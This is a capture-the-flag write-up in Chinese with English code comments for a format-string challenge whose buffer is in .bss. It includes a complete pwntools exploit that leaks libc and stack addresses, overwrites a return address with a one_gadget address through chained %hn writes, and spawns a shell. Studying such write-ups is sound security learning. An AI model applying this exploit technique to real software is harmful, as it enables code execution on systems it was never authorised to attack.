fmt在bss段(neepusec_easy_format)
1.gdb操作
-
vmmap
-
stack
-
retaddr
2.思路
-
先泄漏能够泄漏的地址,包括:当前栈地址、libc地址
-
然后通过下面的指令进行地址写
#这里是只要覆盖偏移为12的地址值的后两个字节 debug() offset0 = ret&0xffff payload = '%'+str(offset0)+'c%12$hnxxxx\x00' p.sendline(payload) p.recvuntil('xxxx') debug() #这里覆盖偏移为25的地址值的后两个字节 offset1 = one&0xffff payload = '%'+str(offset1) +'c%25$hnxxxx\x00' p.sendline(payload) p.recvuntil('xxxx') debug() #修改的永远是指针指向的值 ############################################# payload = '%'+str(offset0+2)+'c%12$hnxxxx\x00' p.sendline(payload) p.recvuntil('xxxx') debug() offset2 = 0xffff&(one>>16) payload = '%'+str(offset2) +'c%25$hnxxxx\x00' p.sendline(payload) p.recvuntil('xxxx')
-
修改流程
-
未修改前
-
第一次修改
-
第二次修改
-
第三次修改
-
-
注意!!!每次修改的值都是二级指针指向的值,不能直接修改
3. exp
from pwn import *
from LibcSearcher import *
# Path of the challenge binary; the commented-out line is the author's remote
# variant of the same session.
BINARY = './pwn'
p = process(BINARY)
#p = remote('neepusec.club',18757)
elf = ELF(BINARY)
# Verbose pwntools I/O logging for the whole session.
context.log_level = 'debug'
def debug():
    """Attach gdb to the running target `p`, then call pwntools' pause() so the
    script waits before the next payload is sent."""
    gdb.attach(p)
    pause()
# --- Exploit flow as written by the author ---
# The target formats attacker-supplied input with a printf-style function, so
# positional "%N$p" reads leak stack/libc words and "%N$hn" writes 16 bits
# through whatever pointer sits in argument slot N.  This is exactly the bug
# class -Werror=format-security flags at compile time, and glibc built with
# _FORTIFY_SOURCE aborts on %n when the format string lives in writable memory
# (here: .bss).
#
# First prompt: answer with a single NUL byte.  All this script shows about the
# prompt is that it ends in ':\n'.
payload = '\x00'
p.sendlineafter(':\n',payload)
# Leak two words: argument slot 23 (bracketed by 'aaaa') and slot 8 (bracketed
# by 'bbbb').  The markers only delimit the echoed output for parsing.
p.send('aaaa%23$pbbbb%8$p')
p.recvuntil('aaaa0x')
# Read 12 hex digits (assumes a 0x7f.. 64-bit address) and subtract 231: the
# author treats slot 23 as a return address into __libc_start_main, 231 being
# the distance back to the symbol.  Both values are specific to the target's
# libc build -- confirm in gdb before reusing.
__libc_start_main = int(p.recv(12),16)-231
log.success('__libc_start_main===>'+hex(__libc_start_main))
# Identify the libc build from that single symbol address and derive its base.
libc = LibcSearcher('__libc_start_main',__libc_start_main)
libc_base = __libc_start_main - libc.dump('__libc_start_main')
log.success('libc_base==>'+hex(libc_base))
# Candidate gadget offsets for the identified libc (presumably one_gadget
# output); only the first one is used.
one = [0x4f3d5,0x4f432,0x10a41c]
one = one[0]+libc_base
log.success('one==>'+hex(one))
# Second leak: slot 8 holds a stack pointer; +8 is the word the author wants to
# rewrite (named `ret` -- presumably the saved return address, as the prose
# section above says).
p.recvuntil('bbbb0x')
ret = int(p.recv(12),16) + 8
log.success('ret==>'+hex(ret))
debug()
# Four 16-bit writes follow.  Per the author's note, every %hn modifies the
# value the slot's pointer refers to, never the slot itself; the pattern
# (set slot 12's target, then write through slot 25) implies slot 12 points at
# the word that slot 25 is read from -- TODO confirm in gdb.
# Write 1: low 16 bits of ret through slot 12.
offset0 = ret&0xffff
payload = '%'+str(offset0)+'c%12$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
# Write 2: low 16 bits of the gadget address through slot 25.
offset1 = one&0xffff
payload = '%'+str(offset1) +'c%25$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
# Write 3: advance the slot-12 target to ret+2 (upper half of the same word).
payload = '%'+str(offset0+2)+'c%12$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
# Write 4: bits 16..31 of the gadget address through slot 25.  Bits above 31
# are never written, so this relies on the overwritten word already holding an
# address with the same upper bits -- verify for the target.
offset2 = 0xffff&(one>>16)
payload = '%'+str(offset2) +'c%25$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
# Presumably control reaches the gadget when the function returns; 'ls' is
# just a probe before handing the session to the user.
p.sendline('ls')
p.interactive()